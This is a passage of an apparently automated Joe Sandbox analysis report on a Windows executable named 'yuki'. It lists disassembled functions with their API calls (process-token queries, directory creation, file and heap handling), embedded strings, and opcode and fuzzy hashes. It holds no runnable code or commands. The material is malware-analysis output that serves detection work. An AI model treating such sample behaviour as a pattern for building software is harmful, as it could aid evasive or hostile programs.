                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                      • Instruction ID: 25b392cdc54cfca4b90d71c18277146c7b7fd4a3e588ff780e188ce062c77b34
                                                                                                      • Opcode Fuzzy Hash: bd5e670e2ac73c9d5051395424effa1a9c5fa8f9f080fcfac4df12f3bd03b0fb
                                                                                                      • Instruction Fuzzy Hash: CBC1D53290C6C6A2E7709F3596682BD7750FB81B82F954131EACD83791CF7DE8458788

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                      • String ID:
                                                                                                      • API String ID: 995526605-0
                                                                                                      • Opcode ID: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                      • Instruction ID: e339c3cb502eff5f959f79b8c20ec07ea538c81bbf30b116e5763778d3ee47ea
                                                                                                      • Opcode Fuzzy Hash: 1c88e2159774aae00215e56fe2a2a719af09135261df6dbcfc7a62e4558c2eb4
                                                                                                      • Instruction Fuzzy Hash: C3214D31A0C64342EA209F65B54422AA3E0EB95BF6F500235EAAD83BE4DE7DD845C744

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF6C81F8570: GetCurrentProcess.KERNEL32 ref: 00007FF6C81F8590
                                                                                                        • Part of subcall function 00007FF6C81F8570: OpenProcessToken.ADVAPI32 ref: 00007FF6C81F85A3
                                                                                                        • Part of subcall function 00007FF6C81F8570: GetTokenInformation.KERNELBASE ref: 00007FF6C81F85C8
                                                                                                        • Part of subcall function 00007FF6C81F8570: GetLastError.KERNEL32 ref: 00007FF6C81F85D2
                                                                                                        • Part of subcall function 00007FF6C81F8570: GetTokenInformation.KERNELBASE ref: 00007FF6C81F8612
                                                                                                        • Part of subcall function 00007FF6C81F8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6C81F862E
                                                                                                        • Part of subcall function 00007FF6C81F8570: CloseHandle.KERNEL32 ref: 00007FF6C81F8646
                                                                                                      • LocalFree.KERNEL32(?,00007FF6C81F3C55), ref: 00007FF6C81F916C
                                                                                                      • LocalFree.KERNEL32(?,00007FF6C81F3C55), ref: 00007FF6C81F9175
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                      • API String ID: 6828938-1529539262
                                                                                                      • Opcode ID: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                      • Instruction ID: e0dbdc5fa55f0d72bfedb60c2872d85cd2e68d0797124577e0f4483e1a68b22e
                                                                                                      • Opcode Fuzzy Hash: 5ed7a9ba3e6ce910408607b93085540bd422a8d0f9e00f9f84049ca226c14b37
                                                                                                      • Instruction Fuzzy Hash: 0F216731A0C74281F720AF30E5192EA62A0FF94B92F554435E98DC3B95DF3DE905C784
                                                                                                      APIs
                                                                                                      • CreateDirectoryW.KERNELBASE(00000000,?,00007FF6C81F352C,?,00000000,00007FF6C81F3F23), ref: 00007FF6C81F7F32
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectory
                                                                                                      • String ID: %.*s$%s%c$\
                                                                                                      • API String ID: 4241100979-1685191245
                                                                                                      • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                      • Instruction ID: 3c6ca8a1bf024c44021713c91f5b30ab54b7f15fbd507d98adad09e2281e633c
                                                                                                      • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                                      • Instruction Fuzzy Hash: 0131C331719AC645EA719F31E8107AA6394EBA4FE2F400631EEAD87BC9DF2CD605C704
                                                                                                      APIs
                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C820CF4B), ref: 00007FF6C820D07C
                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C820CF4B), ref: 00007FF6C820D107
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                      • Instruction ID: cc374c80c31af0c31554c9186050aa71cf91aab7a6c00e3a15461eb0a6ad59e7
                                                                                                      • Opcode Fuzzy Hash: a47a8d54e36ced6583969bea4ac316e5fdc1f02f5f342ddc714eca2f45cad1a1
                                                                                                      • Instruction Fuzzy Hash: 44910672F0969185F7708F7596682BD6BA0BB44B8BF144239DE8E93A85CF3CD442C784
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _get_daylight$_isindst
                                                                                                      • String ID:
                                                                                                      • API String ID: 4170891091-0
                                                                                                      • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                      • Instruction ID: 999092e7ab8e083263861fb68c2f1d12cc70d5d1b4886b2ef4de8f196a8f1950
                                                                                                      • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                      • Instruction Fuzzy Hash: 5D5107B2F042518AEB34CF749B696BC2761AB4436AF500235DD5ED2AE5DF3CE402CB84
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                      • String ID:
                                                                                                      • API String ID: 2780335769-0
                                                                                                      • Opcode ID: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                      • Instruction ID: 18e5606fc3db917e07a2acd4fed2b3145d66907d7a5e972a5fdeb0173b162c94
                                                                                                      • Opcode Fuzzy Hash: 6aefb500db5e0848cb3e1a230f039049599ff649377a7022c72adab745f1037c
                                                                                                      • Instruction Fuzzy Hash: 35519132E046818AFB20DF71D6683BD37A5AB48B59F144434DE8DA7699DF3CD481C384
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279662727-0
                                                                                                      • Opcode ID: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                      • Instruction ID: 97401f69d04c38cc063f73a7e0efb1df9010cade44af20b78504563ffdc80c79
                                                                                                      • Opcode Fuzzy Hash: 8f3d5377b4ca72f71b0fe910297a4b2920b1cd85568e136600ee028e7f718979
                                                                                                      • Instruction Fuzzy Hash: E841A132D187C183E7209F3197283696260FB943A5F109335EADC93AD6DF7CA4E08784
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                      • String ID:
                                                                                                      • API String ID: 3251591375-0
                                                                                                      • Opcode ID: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                      • Instruction ID: fe860b9b81eb31c2efb494db92e6cc9f2381f1c679b48ed117d552974ff1997d
                                                                                                      • Opcode Fuzzy Hash: b3dd18574e8b698ea28c35ed35ed65a6730a16d6ac14c38d0a8ba428da0d66bc
                                                                                                      • Instruction Fuzzy Hash: C2314831E0C15342FA34AF7495653B926D1AF61B87F454034E9CEC7AE3DE2DB805E288
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1703294689-0
                                                                                                      • Opcode ID: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                      • Instruction ID: 369a114e472f3ac306635bc0fca87d7606cad02a2f5723de915bba14f871b5fb
                                                                                                      • Opcode Fuzzy Hash: 148d460979eed4a43ebbf671c65dc2dc638c0d89c9c01e8e00358d5495882c84
                                                                                                      • Instruction Fuzzy Hash: B5D06730B0874652EA242F705A6D17912656F48702B251438C89B863A3DE2DF8495388
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                      • Instruction ID: bf0643f3d68a1f622816c2ca885f8ccb5b28aadf95ede183618787f193027846
                                                                                                      • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                      • Instruction Fuzzy Hash: B6510831B096C186F7399E36962867AE291AF44BA6F184735DDED837C5CF3CE4018788
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 2976181284-0
                                                                                                      • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                      • Instruction ID: b008779507b46128a34941d4777ed275df98281b204d913213e40ecbf1fd7d27
                                                                                                      • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                      • Instruction Fuzzy Hash: DB11C471608A8181DA308F35AA68169A361EB45FF6F544331EEFD877E9CF3CD4518784
                                                                                                      APIs
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C8205839), ref: 00007FF6C8205957
                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6C8205839), ref: 00007FF6C820596D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Time$System$FileLocalSpecific
                                                                                                      • String ID:
                                                                                                      • API String ID: 1707611234-0
                                                                                                      • Opcode ID: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                      • Instruction ID: bbc8284abad3cda39d2dd98e2ad09bd059ed170b37ed1deae8c55a3b2ad1d16e
                                                                                                      • Opcode Fuzzy Hash: 497c6f3b45805196ef8f930e068bad9451f3f50de380bc241881b145e929bf5b
                                                                                                      • Instruction Fuzzy Hash: E211913160C69682EB748F64A62543AB7B0FB84772F600236F6DDC19E8EF2CD414DB84
                                                                                                      APIs
                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF6C8212D22,?,?,?,00007FF6C8212D5F,?,?,00000000,00007FF6C8213225,?,?,?,00007FF6C8213157), ref: 00007FF6C820A95E
                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF6C8212D22,?,?,?,00007FF6C8212D5F,?,?,00000000,00007FF6C8213225,?,?,?,00007FF6C8213157), ref: 00007FF6C820A968
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 485612231-0
                                                                                                      • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                      • Instruction ID: 96848f63ab6409277b4706937fd2882c365d1ca73d6240e5b6b4ccb289f3ad97
                                                                                                      • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                      • Instruction Fuzzy Hash: 47E08660F0924652FF346FF1656D13912505F88B43F844031C88DD72A1DF2CAD818398
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF6C820A9D5,?,?,00000000,00007FF6C820AA8A), ref: 00007FF6C820ABC6
                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF6C820A9D5,?,?,00000000,00007FF6C820AA8A), ref: 00007FF6C820ABD0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseErrorHandleLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 918212764-0
                                                                                                      • Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                      • Instruction ID: 572babd01b1e6b91ab90874f13ee66d9ce573ebe4eb0c870b358a7df8d2e7a74
                                                                                                      • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                      • Instruction Fuzzy Hash: 9C21D430B186C201EEB09F75966837D12929F94792F44423ADAAFC77D6CF6CE4414388
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                      • String ID:
                                                                                                      • API String ID: 3215553584-0
                                                                                                      • Opcode ID: cbeb3b5568c01fe22c816fd393b22aefbfa64644ae8ce1fe3b0dc090283c3b2e
                                                                                                      • Instruction ID: 73704fb91fb52c6b8e269c96719f74c3dc16d7b079b00b5b7c63b37f94b75d4c
                                                                                                      • Opcode Fuzzy Hash: cbeb3b5568c01fe22c816fd393b22aefbfa64644ae8ce1fe3b0dc090283c3b2e
                                                                                                      • Instruction Fuzzy Hash: EB41933291828597EA349E39A66C27973A0EB55B92F500131E6CEC77D1CF6CE402CB95
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2068663885.00007FF6C81F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6C81F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2068609122.00007FF6C81F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068707716.00007FF6C821B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C822E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068776815.00007FF6C8232000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2068931214.00007FF6C8234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff6c81f0000_yuki.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _fread_nolock
                                                                                                      • String ID:
                                                                                                      • API String ID: 840049012-0
                                                                                                      • Opcode ID: aaa7b9ff11bb4346a21cc87fb8eff4a238e48d36b47c5124ab7cd44ae98a1b97
                                                                                                      • Instruction ID: fe2936d7f8c9c5e9a9e955c2bb499327bc03ba622e5ac7ef294fea88dda36244
